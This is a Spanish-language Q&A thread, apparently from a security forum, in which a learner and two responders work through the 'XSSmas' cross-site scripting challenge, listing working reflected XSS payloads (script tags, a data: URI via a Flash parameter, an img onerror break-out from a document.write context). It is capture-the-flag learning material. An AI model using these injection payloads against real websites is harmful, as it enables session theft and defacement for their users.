¿Cómo se puede resolver este desafío xss? [cerrado]

0

Encontré esto: enlace

Y hasta ahora mis soluciones fueron:

1.http://research.insecurelabs.org/xssmas/search.php?query=<script>alert(0)</script>
2. http://research.insecurelabs.org/xssmas/xssmas.swf?clickTAG=data:text/html,<script>alert(0)</script>

pero parece que hay cinco soluciones. ¿Puede alguien ayudarme? Estoy tratando de aprender más sobre XSS. gracias

UPDATED:

I know that two other solutions are related to this:
1.
<script>
var n = '';
if (n != '') {
    $(function() {
        $("h1").html("Merry XSSmas, " + unescape(n) + "!");
    });
}
</script>

2.


<script>
<!-- Analytics: no change below this line -->
document.write('<img src="analytics?url=">');
</script>

Update solved no2:

http://research.insecurelabs.org/xssmas/?url=maxa"><fake></script><script>alert(0)</script>
    
pregunta Daniel 28.12.2012 - 00:15
fuente

3 respuestas

3

Si está tratando de aprender, entonces pedir que otros respondan la pregunta por usted parece contraproducente.

Consulte cheatsheets y otro material para solucionarlo todo.

    
respondido por el schroeder 28.12.2012 - 01:01
fuente
1

Si bien estoy totalmente de acuerdo con todos los que dijeron que, dado que esto es un desafío y usted debería resolverlo por su cuenta, debo decir que este es, después de todo, un sitio de preguntas y respuestas. Usted ha hecho una pregunta y, si puedo, la responderé. Lo que hagas con esa respuesta es tu propia responsabilidad.

Dicho esto, te recomiendo que solo sigas leyendo si hiciste un gran esfuerzo y no pudiste encontrar una respuesta.

Después de algunos fuzzing encontré que hay algo interesante con research.insecurelabs.org/xssmas/index/analytics , parece que algo le pasó ( analytics?SOMETHING ) se escribe aquí document.write('<img src="analytics?url=SOMETHING">');

Probar con .../xssmas/index/analytics?<script>alert(0)</script> no produjo ningún resultado, así que decidí probar el clásico onerror :

.../xssmas/index/analytics?<img src="giveMe404" onerror="alert(0)">

Y funcionó.

¡Buena suerte encontrando el resto!

    
respondido por el Adi 28.12.2012 - 15:24
fuente
0
  

Probar con .../xssmas/index/analytics?<script>alert(0)</script> no produjo ningún resultado, así que decidí probar el clásico onerror:

Deberías imaginarte cómo se ve el script de la página del servidor ... podría ser algo así:

<script> <!-- Analytics: no change below this line --> document.write('<img src="analytics?url=<?php echo $variable; ?>">'); </script>

Su ejemplo funcionaría pero necesita "borrar" el resto del código JS innecesario. Quiero decir: ">');

    
respondido por el n0-clues 28.12.2012 - 16:22
fuente

Lea otras preguntas en las etiquetas